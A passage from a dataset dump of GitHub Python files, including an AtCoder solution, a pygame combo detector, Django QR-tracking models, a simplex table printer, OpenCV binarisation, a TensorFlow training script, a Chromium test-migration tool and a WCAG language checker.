cast_info","repo_name":"katiehuang1221/Predict-Revenue-Of-Movie-Adaptation","sub_path":"py/get_cast.py","file_name":"get_cast.py","file_ext":"py","file_size_in_byte":4263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"34112258458","text":"S = input()\nT = input()\ncnt = 0\nfor i, s in enumerate(S[-len(T):]):\n if T[i] == s or (s == \"?\" or T[i] == \"?\"):\n cnt += 1\nans = [\"Yes\" if cnt == len(T) else \"No\"]\nfor idx in range(len(T)):\n added, popped = S[idx], S[-len(T) + idx]\n if T[idx] != \"?\" and (popped == \"?\" or popped == T[idx]):\n cnt -= 1\n if T[idx] != \"?\" and (added == \"?\" or added == T[idx]):\n cnt += 1\n ans.append(\"Yes\" if cnt == len(T) else \"No\")\nprint(*ans, sep=\"\\n\")\n","repo_name":"kazu0716/programing_training","sub_path":"atcoder/ABC/287/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"7355904461","text":"#!/usr/bin/env python3\n'''\nSet combos.\n\nThe rule is: two keys are a combo.\n'''\nimport sys\nimport pygame\nfrom pygame.locals import *\nfrom .controller import (\n Controller,\n set_controllers_verbose,\n)\nfrom .controls import (\n controller1,\n get_button_if_exists,\n)\nfrom .pygameinput import(\n read_event,\n)\n\nwatched = ('jump', 'x<0', 'x>0', 'nab')\nwaspressed = dict((k, False) for k in watched)\ncombokeys = set()\ncombostart = None\ncombodict = {}\n\n\ndef addcombo(keys, name):\n combodict[tuple(sorted(keys))] = name\n\n\naddcombo(('nab',), \"nab\") # formerly K_SPACE\naddcombo(('jump',), \"leap\") # formerly K_UP\naddcombo(('x<0',), \"turn-r\") # formerly K_LEFT\naddcombo(('x>0',), \"turn-l\") # formerly K_RIGHT\n# ^ Why they are opposite: turning in mid-air is the combo\naddcombo(('jump', 'nab'), \"twirl\") # formerly (K_UP, K_SPACE)\naddcombo(('x>0', 'nab'), \"roll-r\") # formerly (K_RIGHT, K_SPACE)\naddcombo(('x<0', 'nab'), \"roll-l\") # formerly (K_LEFT, K_SPACE)\naddcombo(('x>0', 'jump'), \"dart-r\") # formerly (K_RIGHT, K_UP)\naddcombo(('x<0', 'jump'), \"dart-l\") # formerly (K_LEFT, K_UP)\n# ^ bound and dart are opposites\n# - See feat.py\n\n\nfrom enum import Enum\n\n\ndef error(msg):\n sys.stderr.write(\"{}\\n\".msg)\n\n\ndef equalsPart(list1, list2):\n count = int(min(len(list1), len(list2)))\n for i in range(count):\n if list1[i] is not list2[i]:\n return False\n return True\n\n\ndef get_combo(controller1):\n global waspressed, combokeys, combostart\n\n ispressed = dict((k, controller1.getBool(k)) for k in watched)\n newkeys = [k for k in watched if ispressed[k] and not waspressed[k]]\n r = ()\n if combokeys:\n # print(\"combokeys:{}\".format(combokeys))\n if not all(controller1.getBool(k) for k in combokeys): # End the combo now\n r = combokeys\n if newkeys:\n combokeys = set(newkeys)\n combostart = pygame.time.get_ticks()\n else:\n combokeys = set()\n combostart = None\n elif newkeys:\n combokeys |= set(newkeys)\n if combokeys and pygame.time.get_ticks() - combostart > 100: # Combo timed out\n r = combokeys\n combokeys = set()\n combostart = None\n elif newkeys:\n combokeys = set(newkeys)\n combostart = pygame.time.get_ticks()\n waspressed = ispressed\n r = tuple(sorted(r))\n return combodict[r] if r in combodict else \"\"\n\n\nif __name__ == \"__main__\":\n\n # Go to a module test mode if the module runs directly.\n pygame.init()\n pygame.joystick.init()\n joysticks = [pygame.joystick.Joystick(x) for x in range(pygame.joystick.get_count())]\n print(\"Pygame found {} joystick(s).\".format(len(joysticks)))\n if len(joysticks) > 0:\n for joystick in joysticks:\n joystick.init()\n pygame.display.set_mode((800, 300))\n clock = pygame.time.Clock()\n while True:\n dt = clock.tick(60) * 0.001\n for event in pygame.event.get():\n result = 0\n if event.type == QUIT:\n sys.exit()\n else:\n result = read_event(controller1, event)\n # k = pygame.key.get_pressed()\n # pressed = controller1.toKeys()\n # read_joysticks(controller1, joysticks)\n # k = controller1.toKeys()\n kcombo = get_combo(controller1)\n if kcombo:\n print(kcombo)\n if controller1.getBool('EXIT'):\n sys.exit()\n\n","repo_name":"Poikilos/lepidopterist","sub_path":"src/combo.py","file_name":"combo.py","file_ext":"py","file_size_in_byte":3463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"73795603524","text":"from django.db import models\nfrom django.conf import settings\nfrom django.core.validators import RegexValidator\nimport qrcode\nimport qrcode.image.svg\n\nclass Promoter(models.Model):\n first_name = models.CharField(max_length=30)\n last_name = models.CharField(max_length=30)\n email = models.EmailField()\n phone_regex = RegexValidator(regex=r'^\\+?1?\\d{9,15}$', message=\"Phone number must be entered in the format: '+999999999'. Up to 15 digits allowed.\")\n phone_number = models.CharField(validators=[phone_regex], max_length=17, blank=True) # validators should be a list\n\n def __str__(self):\n return \"Promoter: {0} {1}\".format(self.first_name, self.last_name)\n \n def full_name(self):\n return \"{0} {1}\".format(self.first_name, self.last_name)\n\nclass Location(models.Model):\n name = models.CharField(max_length=255)\n address1 = models.CharField(\n \"Address line 1\",\n max_length=1024,\n )\n address2 = models.CharField(\n \"Address line 2\",\n max_length=1024,\n blank=True,\n default=''\n )\n zip_code = models.CharField(\n \"ZIP / Postal code\",\n max_length=12,\n )\n city = models.CharField(\n \"City\",\n max_length=1024,\n )\n country = models.CharField(\n \"Country\",\n max_length=3,\n default='USA',\n )\n phone_regex = RegexValidator(regex=r'^\\+?1?\\d{9,15}$', message=\"Phone number must be entered in the format: '+999999999'. Up to 15 digits allowed.\")\n phone_number = models.CharField(validators=[phone_regex], max_length=17, blank=True) # validators should be a list\n\n def __str__(self):\n return \"Location record for {0}\".format(self.name)\n\nclass Event(models.Model):\n name = models.CharField(max_length=255)\n date = models.DateField()\n location = models.ForeignKey(\n Location,\n on_delete=models.CASCADE,\n verbose_name=\"the location of the event\",\n )\n\n def __str__(self):\n return \"{0} on {1}\".format(self.name, self.date)\n\nclass EventPromoter(models.Model):\n\n actions = ['generate_qr_code']\n\n event = models.ForeignKey(\n Event,\n on_delete=models.PROTECT,\n verbose_name=\"the event\",\n )\n promoter = models.ForeignKey(\n Promoter,\n on_delete=models.PROTECT,\n verbose_name=\"the promoter\",\n )\n\n def generate_qr_code(self):\n location = '{BASE_URL}/api/event_promoter/{promoter_id}/'.format(\n BASE_URL = settings.APP_LOCATION,\n promoter_id = self.pk\n )\n img = qrcode.make(location)\n return img \n \n def __str__(self):\n print(self.__dict__)\n return \"{0} {1} promotion for event: {2}\".format(self.promoter.first_name, self.promoter.last_name, self.event.name)\n\nclass EventPromoterRegister(models.Model):\n event_promoter = models.ForeignKey(\n EventPromoter,\n on_delete=models.DO_NOTHING,\n verbose_name=\"the event promoter\",\n )\n timestamp = models.DateTimeField(auto_now_add=True)\n","repo_name":"tylerblox/QRTracker","sub_path":"backend/qrtracker/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"4681998731","text":"\n\n# def parse_factors(func: str, coef: int = 1) -> list:\n# func_factors = []\n# func = func.split()\n# for i in range(len(func)):\n# if \"x_\" in func[i]:\n# if func[i].find(\"x_\") == 0:\n# to_add = 1\n# else:\n# to_add = int(func[i][:func[i].find(\"x_\")])\n# func_factors.append(\n# coef*to_add)\n# if (func[i-1] == \"-\"):\n# func_factors[-1] *= -1\n# return func_factors\n\n\n# input_ = [\"F = 4x_1 + 5x_2 + 4x_3 -> max\",\n# \"2x_1 + 3x_2 + 6x_3 <= 240\",\n# \"4x_1 + 2x_2 + 4x_3 <= 200\",\n# \"4x_1 + 6x_2 + 8x_3 <= 160\",\n# \"x_1, x_2, x_3 >= 0\"]\n\n\nfrom termcolor import colored\n\n# Находим те индексы которые относятся к базису ([0, 0, 1, 1, 1] -> [2, 3, 4])\n\n\ndef calc_basis_indexes(basis: list) -> list:\n return list(filter(lambda x: x != -1, map(lambda x: x if basis[x] else -1, range(len(basis)))))\n\n\n# Считаем оценку, позволяющую понять, что следует ввести в базис или найдено ли оптимальное решение\ndef calculate_costs(function, basis, factors):\n costs = []\n basis_indexes = calc_basis_indexes(basis)\n for i in range(len(function)):\n subtotal = -function[i]\n for j in range(len(basis_indexes)):\n subtotal += function[basis_indexes[j]] * factors[j][i]\n costs.append(subtotal)\n return costs\n\n\n# Дополняем наш вектор решений нулями\ndef extend_solutions(solutions, basis):\n res = list(solutions)\n for i in range(len(basis)):\n if basis[i] == 0:\n res.insert(i, 0)\n return res\n\n\n# Тут должно быть очевидно\ndef dot_product(op1, op2):\n return [op1[i] * op2[i] for i in range(len(op1))]\n\n\n# Какой-никакой, но форматированный вывод\ndef print_table(function, factors, basis, solutions, end=False):\n func = [f\"{i:^11.2f}\" for i in function]\n fact = [[f\"{j:^11.2f}\" for j in i] for i in factors]\n sols = extend_solutions(solutions, basis)\n sols.append(sum(dot_product(sols, function)))\n sols = [f\"{i:^11.2f}\" for i in sols]\n basis_indexes = calc_basis_indexes(basis)\n bas = [f\"| x{i+1:<3d} \" for i in basis_indexes]\n separator = \"+-------\"+\"+-----------\"*(len(func)+1)+\"+\"\n costs = [f\"{i:^11.2f}\" for i in calculate_costs(\n function, basis, factors)]\n print(separator)\n print(\"| f =\" + \"+\".join(func) + \"=\" +\n colored(sols[-1], \"green\" if end else 'red')+\"|\")\n print(\"| x = (\" + \",\".join(sols[:-1]) + \")\" + \" |\")\n print(separator)\n print(\"| \", *\n [f\"| x{i+1:<5d}\" for i in range(len(func))], \"| |\")\n for i in range(len(fact)):\n print(bas[i], *fact[i], sols[basis_indexes[i]], sep=\"|\", end=\"|\\n\")\n print(separator)\n print(\"| Δ \", *costs, \" \", sep=\"|\", end=\"|\\n\")\n print(separator)\n\n\n# Данные\nfunction = [4, 5, 4, 0, 0, 0]\n\nfactors = [[2, 3, 6, 1, 0, 0],\n [4, 2, 4, 0, 1, 0],\n [4, 6, 8, 0, 0, 1]]\n\nbasis = [0, 0, 0, 1, 1, 1]\n\nsolutions = [240, 200, 160]\n\n\nprint_table(function, factors, basis, solutions)\n","repo_name":"atella123/Symplex-method","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"71259145284","text":"# coding:utf-8\n\nimport cv2 as cv\nimport numpy as np\n\n\ndef big_image_binary(image):\n print(image.shape)\n cw = 256\n ch = 256\n h, w = image.shape[:2]\n gary = cv.cvtColor(image, cv.COLOR_BGR2GRAY)\n for row in range(0, h, ch):\n for col in range(0, w, cw):\n roi = gary[row:row+ch, col:cw+col]\n dev = np.std(roi)\n if dev < 15:\n gary[row:row + ch, col:cw + col] = 255\n else:\n ret, dst = cv.threshold(roi, 0, 255, cv.THRESH_BINARY | cv.THRESH_OTSU)\n gary[row:row + ch, col:cw + col] = dst\n\n print(np.std(dst), np.mean(dst))\n cv.imwrite(\"result_binary.png\", gary)\n \n\nsrc = cv.imread(\"opencv-4.4.0/data/test123.png\")\n# cv.namedWindow(\"the first image\", cv.WINDOW_AUTOSIZE)\n# cv.imshow(\"the first image\", src)\nbig_image_binary(src)\ncv.waitKey(0)\ncv.destroyAllWindows()\n\n\n# 测试功能\n# 超大图像二值化\n# 代码编写时间 2020.8.15\n","repo_name":"STLLYM/Opencv_python_learning","sub_path":"oversize_image_bin.py","file_name":"oversize_image_bin.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"31625746262","text":"import logging\nimport os\n\nfrom absl import app\nfrom absl import flags\n\nimport tensorflow as tf\n\nfrom contrack import data\nfrom contrack import encoding\nfrom contrack import env\nfrom contrack import model\n\nflags.DEFINE_string('model_path', '',\n 'Base output directory where the model is stored.')\nflags.DEFINE_string('config_path', '', 'File path of config json file.')\nflags.DEFINE_string(\n 'config_json', '',\n 'The contents of a json config file if --config_file was not provided.')\nflags.DEFINE_string(\n 'mode', '',\n 'How to train the model, either \"only_new_entities\", \"only_tracking\", \"full\" or \"two_steps\".'\n)\nflags.DEFINE_string(\n 'train_data_glob', '',\n 'A TF glob pattern specifying the location of the training data files.')\nflags.DEFINE_string(\n 'eval_data_glob', '',\n 'A TF glob pattern specifying the location of the validation data files.')\nFLAGS = flags.FLAGS\n\n\ndef train(argv):\n \"\"\"Train a contrack model.\"\"\"\n del argv # Unused.\n\n mode = FLAGS.mode\n if FLAGS.config_path:\n config = env.ContrackConfig.load_from_path(FLAGS.config_path)\n elif FLAGS.config_json:\n config = env.ContrackConfig.load_from_json(FLAGS.config_json)\n else:\n raise ValueError('Must provide --config_path or --config_json')\n\n logging.info('Training with config:\\n%s', config)\n encodings = encoding.Encodings()\n env.Env.init(config, encodings)\n environment = env.Env.get()\n\n logging.info('Reading training data from %s', FLAGS.train_data_glob)\n train_data = data.read_training_data(FLAGS.train_data_glob, config, encodings)\n\n if FLAGS.eval_data_glob:\n logging.info('Reading validation data from %s', FLAGS.eval_data_glob)\n eval_data = data.read_eval_data(FLAGS.eval_data_glob, config, encodings)\n else:\n eval_data = None\n\n tensorboard_dir = os.path.join(FLAGS.model_path, 'tensorboard')\n checkpoint_dir = os.path.join(FLAGS.model_path, 'checkpoints')\n callbacks = [\n tf.keras.callbacks.TensorBoard(log_dir=tensorboard_dir),\n tf.keras.callbacks.ModelCheckpoint(filepath=checkpoint_dir),\n tf.keras.callbacks.TerminateOnNaN()\n ]\n\n\n # Compile model\n if mode == 'only_new_entities' or mode == 'full' or mode == 'only_tracking':\n contrack_model = model.ContrackModel(mode)\n loss = model.ContrackLoss(mode)\n metrics = model.build_metrics(mode)\n optimizer = tf.keras.optimizers.Adam(learning_rate=config.learning_rate)\n contrack_model.compile(optimizer=optimizer, loss=loss, metrics=metrics)\n\n # Do the actual training\n contrack_model.fit(\n x=train_data,\n epochs=int(config.max_steps / config.steps_per_epoch),\n callbacks=callbacks,\n steps_per_epoch=config.steps_per_epoch,\n validation_data=eval_data)\n elif mode == 'two_steps':\n logging.info('Training new entity model...')\n new_id_model = model.ContrackModel('only_new_entities')\n loss = model.ContrackLoss('only_new_entities')\n metrics = model.build_metrics('only_new_entities')\n optimizer = tf.keras.optimizers.Adam(\n learning_rate=config.learning_rate, clipnorm=1.0)\n new_id_model.compile(optimizer=optimizer, loss=loss, metrics=metrics)\n new_id_model.fit(\n x=train_data,\n epochs=int(config.max_steps / config.steps_per_epoch),\n callbacks=callbacks,\n steps_per_epoch=config.steps_per_epoch,\n validation_data=eval_data)\n\n logging.info('Training tracking model...')\n contrack_model = model.ContrackModel('only_tracking')\n loss = model.ContrackLoss('only_tracking')\n metrics = model.build_metrics('only_tracking')\n optimizer = tf.keras.optimizers.Adam(learning_rate=config.learning_rate)\n contrack_model.compile(optimizer=optimizer, loss=loss, metrics=metrics)\n contrack_model.init_weights_from_new_entity_model(new_id_model)\n contrack_model.fit(\n x=train_data,\n epochs=int(config.max_steps / config.steps_per_epoch),\n callbacks=callbacks,\n steps_per_epoch=config.steps_per_epoch,\n validation_data=eval_data)\n else:\n raise ValueError('Unknown mode \"%s\"' % mode)\n\n # Save it\n filepath = FLAGS.model_path\n with tf.keras.utils.custom_object_scope(model.get_custom_objects()):\n tf.keras.models.save_model(contrack_model, filepath)\n environment.config.save(filepath)\n environment.encodings.save(filepath)\n\n\nif __name__ == '__main__':\n app.run(train)\n","repo_name":"google-research/google-research","sub_path":"contrack/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4367,"program_lang":"python","lang":"en","doc_type":"code","stars":31433,"dataset":"github-code","pt":"99"} +{"seq_id":"806967687","text":"#!/usr/bin/env python\n\nimport model\nimport test_convert_agent\nimport base_agent\n\nimport codecs\nimport jinja2\nimport logging\nimport re\nimport os\n\n_TEST_COMMON_JINJA_TEMPLATE = \"\"\"\n// Copyright 2017 The Chromium Authors. All rights reserved.\n// Use of this source code is governed by a BSD-style license that can be\n// found in the LICENSE file.\n\npackage {{ package }};\n\n{%for i in imports%}\n{{ i }}\n{% endfor %}\n\n// TODO(yolandyan): move this class to its test rule once JUnit4 migration is over\nfinal class {{classname}} {\n {% for f in fields %}\n {{ f }}\n {% endfor %}\n private final {{common_callback}} mCallback;\n\n {{classname}}({{common_callback}} callback) {\n mCallback = callback;\n }\n\n {% for m in methods %}\n {{ m }}\n {% endfor %}\n\n public interface {{common_callback}} {\n //FILL_CALLBACK\n }\n}\n\"\"\"\n\n_TEST_RULE_JINJA_TEMPLATE = \"\"\"\n\n// Copyright 2017 The Chromium Authors. All rights reserved.\n// Use of this source code is governed by a BSD-style license that can be\n// found in the LICENSE file.\n\npackage {{ package }};\n\n{%for i in imports%}\n{{ i }}\n{% endfor %}\n\npublic class {{classname}} extends FILL_SUPER implements {{common_callback}} {\n {% for f in fields %}\n {{ f }}\n {% endfor %}\n\n private final {{testcommon}} mTestCommon;\n\n public {{classname}}(Class<> activityClass) {\n super(activityClass);\n mTestCommon = new {{testcommon}}(this);\n }\n\n {% for m in methods %}\n {{ m }}\n {% endfor %}\n}\n\"\"\"\n\n\nclass BaseCaseAgent(test_convert_agent.TestConvertAgent):\n \"\"\"\n Agent used to convert test base class, generate TestCommon and TestRule file\n \"\"\"\n @classmethod\n def ignore_files(cls):\n return ['chrome/test/android/javatests/src/org/chromium/chrome/test/\\\n ChromeActivityTestCaseBase.java']\n\n @classmethod\n def filename_match(cls, whole_path):\n if whole_path.endswith('TestBase.java'):\n return True\n if whole_path.endswith('TestCaseBase.java'):\n return True\n else:\n return False\n\n @staticmethod\n def class_runner():\n raise Exception(\"This should not be called\")\n\n @staticmethod\n def raw_api_mapping():\n return {}\n\n def _object_to_string(self,element):\n return self.content[\n self._lexposToLoc(element.lexpos):self._lexposToLoc(element.lexend)+1]\n\n def _all_objects_to_string_list(self, elements):\n return [self._object_to_string(e) for e in elements]\n\n def getPackage(self):\n return self.element_table[model.PackageDeclaration][0].name.value\n\n def implementsTestCommonCallback(self, common_callback_class_name):\n self._replaceString(\n r'(^public.*?){', r'\\1implements %s {' % common_callback_class_name,\n element=self.main_class)\n\n def createGetter(self, field):\n try:\n variable_name = field.variable_declarators[0].variable.name\n if variable_name.startswith('m'):\n method_name = variable_name[1:]\n elif '_' in variable_name:\n method_name = ''.join([x.capitalize() for x in variable_name.split('_')])\n\n return_type = field.type.name.value\n method = 'public %s get%s() {\\n return mTestCommon.%s;\\n }' % (\n return_type, method_name, variable_name)\n assert isinstance(field, model.FieldDeclaration)\n first_method = self.main_element_table[model.MethodDeclaration][0]\n self._insertAbove(first_method, method)\n except Exception:\n self.logger.warn('Failed to create getter for %s', field)\n\n def removeAndReturnStaticFields(self):\n field_list = self.main_element_table.get(model.FieldDeclaration, [])\n (static_accessible, static_inaccessible, member_accessible,\n member_inaccessible) = ([], [], [], [])\n for i in field_list:\n if 'public' in i.modifiers or 'protected' in i.modifiers:\n self.createGetter(i)\n if 'static' in i.modifiers:\n static_accessible.append(self._removeElement(i))\n else:\n member_accessible.append(self._removeElement(i))\n else:\n if 'static' in i.modifiers:\n static_inaccessible.append(self._removeElement(i))\n else:\n member_inaccessible.append(self._removeElement(i))\n return (member_accessible, member_inaccessible, static_accessible,\n static_inaccessible)\n\n def _methodUnderBlock(self, m):\n block_range = []\n for b in self.main_element_table[model.Block]:\n block_range.append((b.lexpos, b.lexend))\n for r in block_range:\n if m.lexpos > r[0] and m.lexend < r[1]:\n return True\n return super.skip()\n\n def getMethods(self):\n accessible, inaccessible = [], []\n for m in self.actionOnMethodDeclaration(\n condition=lambda x:'\\n' == self.content[self._lexposToLoc(x.lexpos-5)]):\n if 'public' in m.modifiers or 'protected' in m.modifiers:\n accessible.append(m)\n else:\n inaccessible.append(m)\n return accessible, inaccessible\n\n def removeElements(self, elements):\n for i in elements:\n self._removeElement(i)\n\n def getElementContent(self, elements):\n content = []\n for m in elements:\n content.append(self._object_to_string(m))\n return content\n\n def CommonizeAndRemoveMethods(self, methods):\n for m in methods:\n arg = '()'\n if m.parameters:\n arg = '(%s)' % ', '.join([p.variable.name for p in m.parameters])\n self._replaceString(\n r'(.*?) {.*}',\n r'\\1 {\\n mTestCommon.%s%s;\\n }' % (m.name, arg),\n element=m, flags=re.DOTALL)\n\n def actions(self):\n self.changeAssertions()\n self.SaveAndReload()\n package = self.getPackage()\n\n # Get dirname and file names for test common and test rule\n dirname = '/'.join(self._filepath.split('/')[:-1])\n filename = self._filepath.split('/')[-1]\n prefix = re.match(r'(.*)Test.*\\.java', filename).group(1)\n test_common_class_name = prefix+'TestCommon'\n test_common_callback_class_name = test_common_class_name+'Callback'\n test_rule_class_name = prefix+'TestRule'\n\n self.implementsTestCommonCallback(test_common_class_name)\n\n (_, inaccessible_member_fields, accessible_static_fields,\n inaccessible_static_fields) = self.removeAndReturnStaticFields()\n\n accessible_methods, inaccessible_methods = self.getMethods()\n accessible_methods_content_list = self.getElementContent(accessible_methods)\n inaccessible_method_content_list = self.getElementContent(\n inaccessible_methods)\n class_list = self.actionOnX(model.ClassDeclaration, main_table=False,\n condition=lambda x: not x == self.main_class)\n class_content_list = self.getElementContent(class_list)\n self.removeElements(inaccessible_methods)\n self.removeElements(class_list)\n\n self.CommonizeAndRemoveMethods(accessible_methods)\n self.SaveAndReload()\n commonized_methods, _ = self.getMethods()\n\n imports = self.actionOnX(model.ImportDeclaration, main_table=False)\n\n test_common_dict = {\n 'classname': test_common_class_name,\n 'package': package,\n 'imports': self._all_objects_to_string_list(imports),\n 'classes': class_content_list,\n 'fields': inaccessible_static_fields+inaccessible_member_fields,\n 'methods': inaccessible_method_content_list\\\n + accessible_methods_content_list,\n 'common_callback': test_common_callback_class_name,\n }\n\n test_rule_dict = {\n 'classname': test_rule_class_name,\n 'package': package,\n 'imports': self._all_objects_to_string_list(imports),\n 'fields': accessible_static_fields,\n 'methods': self._all_objects_to_string_list(commonized_methods),\n 'testcommon': test_common_class_name,\n 'common_callback': test_common_callback_class_name,\n }\n\n self.generateClass(_TEST_COMMON_JINJA_TEMPLATE, test_common_dict,\n os.path.join(dirname, test_common_class_name+'.java'))\n self.generateClass(_TEST_RULE_JINJA_TEMPLATE, test_rule_dict,\n os.path.join(dirname, test_rule_class_name+'.java'))\n test_rule_agent = base_agent.BaseAgent(\n self.parser, os.path.join(dirname, test_rule_class_name+'.java'))\n test_rule_agent.actionOnMethodDeclaration(\n action=lambda x: test_rule_agent._replaceString(\n 'protected', 'public', element=x))\n self.Save()\n test_rule_agent.Save()\n\n def generateClass(self, template_string, data, filepath):\n with codecs.open(filepath, encoding='utf-8', mode='w') as f:\n f.write(jinja2.Template(template_string).render(data))\n\n def skip(self):\n return False\n\n\n\n","repo_name":"yoland68/chromium-junit-auto-migrate","sub_path":"src/test_base_convert_agent.py","file_name":"test_base_convert_agent.py","file_ext":"py","file_size_in_byte":8537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"13156822275","text":"from functools import wraps\nimport stack.repo\n\ndef rewrite_frontend_repo_file(command_run_method):\n\t@wraps(command_run_method)\n\tdef wrapper(*args, **kwargs):\n\t\tcommand_obj = args[0]\n\t\toriginal_box_data = command_obj.call('list.box', [command_obj.db.getHostBox('localhost')])\n\t\tcommand_run_method(*args, **kwargs)\n\t\tnew_box_data = command_obj.call('list.box', [command_obj.db.getHostBox('localhost')])\n\t\tif original_box_data != new_box_data:\n\t\t\tcommand_obj.deferred.callback(stack.repo.rewrite_repofile)\n\treturn wrapper\n","repo_name":"Teradata/stacki","sub_path":"common/src/stack/command/stack/deferable/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":232,"dataset":"github-code","pt":"99"} +{"seq_id":"13131471717","text":"\"\"\"Detect infractions against WCAG 3.1.2.\"\"\"\n\nfrom typing import List, Optional, Tuple\n\nfrom lxml.etree import _ElementTree\nfrom lxml.html import HtmlElement\n\nfrom ..models import LanguageInfraction\nfrom .utils_3_1 import count_words, predict_language\n\nMIN_WORDS_DEFAULT = 4\nMIN_WORDS_HIDDEN = 2\nHIDDEN_ATTRIBUTES = {\"aria-label\", \"alt\", \"value\", \"title\"}\n\n\ndef detect_wcag_3_1_2_infractions(\n body_html: HtmlElement, html_language: str\n) -> List[LanguageInfraction]:\n \"\"\"Detect WCAG 3.1.2 infractions in the given web page.\n\n Parameters\n ----------\n body_html : HtmlElement\n The body of the web page\n html_language : str\n The page's defined language\n\n Returns\n -------\n List[LanguageInfraction]\n The detected infractions against WCAG 3.1.2\n \"\"\"\n # Obtain the infractions recursively\n tree = body_html.getroottree()\n _, _, _, infractions = _dfs(tree, body_html, html_language, [])\n\n return infractions\n\n\ndef _dfs(\n tree: _ElementTree,\n element: HtmlElement,\n parent_language: str,\n infractions: List[LanguageInfraction],\n) -> Tuple[str, Optional[str], Optional[str], List[LanguageInfraction]]:\n \"\"\"Check for infractions against WCAG 3.1.2 using a recursive DFS.\n\n Parameters\n ----------\n tree : _ElementTree\n The root element tree of the web page, used to calculate the xpath\n element : HtmlElement\n The current element to check for infractions\n parent_language : str\n The defined language of the current element's parent\n infractions : List[LanguageInfraction]\n The infractions found until now\n\n Returns\n -------\n Tuple[str, Optional[str], Optional[str], List[LanguageInfraction]]\n A tuple containing:\n - the explicitly defined language of the current element\n - the detected language of the current element\n - the text of the current element\n - the infractions found\n \"\"\"\n # If the current element does not have a `lang` attribute, take the parent's language\n defined_language = element.get(\"lang\", parent_language).lower()[:2]\n\n # The text contained in this element (and in this element alone)\n text = (element.text or \"\").replace(\"\\n\", \" \").strip()\n\n # Check for infractions against WCAG 3.1.2 in hidden attributes\n hidden_infraction = _check_hidden_attributes(tree, element, defined_language)\n if hidden_infraction is not None:\n infractions.append(hidden_infraction)\n\n # Check for infractions against WCAG 3.1.2 in the current element's children\n children = element.getchildren()\n if children:\n # Run this function on each of the children (= recursion)\n children_results = [_dfs(tree, child, defined_language, infractions) for child in children]\n\n # Differ between children that are similar and children that are different\n if len({(defined, detected) for defined, detected, _, _ in children_results}) == 1:\n # All children have the same language defined and detected\n child_defined_language, child_detected_language, _, _ = children_results[0]\n children_text = \" \".join(str(child_result[2]) for child_result in children_results)\n if child_detected_language and child_defined_language != child_detected_language:\n # All children are wrong\n # Give a warning for the current element instead of for each of its children\n infractions.append(\n LanguageInfraction(\n wcag_criterion=\"WCAG_3_1_2\",\n xpath=tree.getpath(element),\n html_language=child_defined_language,\n predicted_language=child_detected_language,\n text=children_text,\n )\n )\n else:\n # The children have different values for their defined and detected languages\n for child, child_result in zip(children, children_results):\n child_defined_language, child_detected_language, child_text, _ = child_result\n if child_detected_language and child_detected_language != child_defined_language:\n # This child is wrong, give a warning for only this child\n infractions.append(\n LanguageInfraction(\n wcag_criterion=\"WCAG_3_1_2\",\n xpath=tree.getpath(child),\n html_language=child_defined_language,\n predicted_language=child_detected_language,\n text=str(child_text),\n )\n )\n\n # If any of the children of the current element contains a very short piece of text, add it\n # to the current element's text\n for _, _, child_text, _ in children_results:\n if child_text is None:\n continue\n child_text = child_text.strip()\n\n # We only add the child text if it is short\n if count_words(child_text) >= MIN_WORDS_DEFAULT:\n continue\n current_text = (text or \"\").strip()\n\n # We only add the child text if the current text doesn't end with the child text\n if not current_text.endswith(child_text):\n text = current_text + \" \" + child_text\n\n # If the current element's text is long enough, predict its language\n if count_words(text) >= MIN_WORDS_DEFAULT:\n detected_language = predict_language(text)\n else:\n detected_language = None\n\n return defined_language, detected_language, text, infractions\n\n\ndef _check_hidden_attributes(\n tree: _ElementTree, element: HtmlElement, defined_language: str\n) -> Optional[LanguageInfraction]:\n \"\"\"Check for an infraction in the hidden attributes of an element.\n\n Parameters\n ----------\n tree : _ElementTree\n The root element tree of the web page, used to calculate the xpath\n element : HtmlElement\n The current element to check for an infraction\n defined_language : str\n The defined language of the current element\n\n Returns\n -------\n Optional[LanguageInfraction]\n Either an infraction against WCAG 3.1.2 or `None`\n \"\"\"\n for attribute_name in HIDDEN_ATTRIBUTES:\n if attribute_name in element.attrib:\n attribute_value = element.attrib[attribute_name].strip()\n if count_words(attribute_value) < MIN_WORDS_HIDDEN:\n # If the hidden attribute's value is too short, we don't check its language\n continue\n detected_language = predict_language(attribute_value)\n if detected_language and defined_language != detected_language:\n # The hidden attribute is wrong, return an infraction\n return LanguageInfraction(\n wcag_criterion=\"WCAG_3_1_2\",\n xpath=tree.getpath(element),\n html_language=defined_language,\n predicted_language=detected_language,\n text=attribute_value,\n )\n return None\n","repo_name":"radix-ai/fod-bosa-accessibility-check-backend","sub_path":"src/accessibility_check_backend/wcag/wcag_3_1_2.py","file_name":"wcag_3_1_2.py","file_ext":"py","file_size_in_byte":7187,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"11228468806","text":"def solution(n, arr1, arr2):\n arr1_0b = []\n arr2_0b = []\n for i in arr1:\n arr1_0b.append(bin(i)[2:].zfill(n))\n for i in arr2:\n arr2_0b.append(bin(i)[2:].zfill(n))\n \n answer = []\n for i1, i2 in zip(arr1_0b, arr2_0b):\n string = \"\"\n for x, y in zip(i1, i2):\n if x == '1' or y == '1':\n string += \"#\"\n else:\n string += \" \"\n answer.append(string) \n \n return answer","repo_name":"tmkimm/Algorithm","sub_path":"programmers/비밀지도.py","file_name":"비밀지도.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} 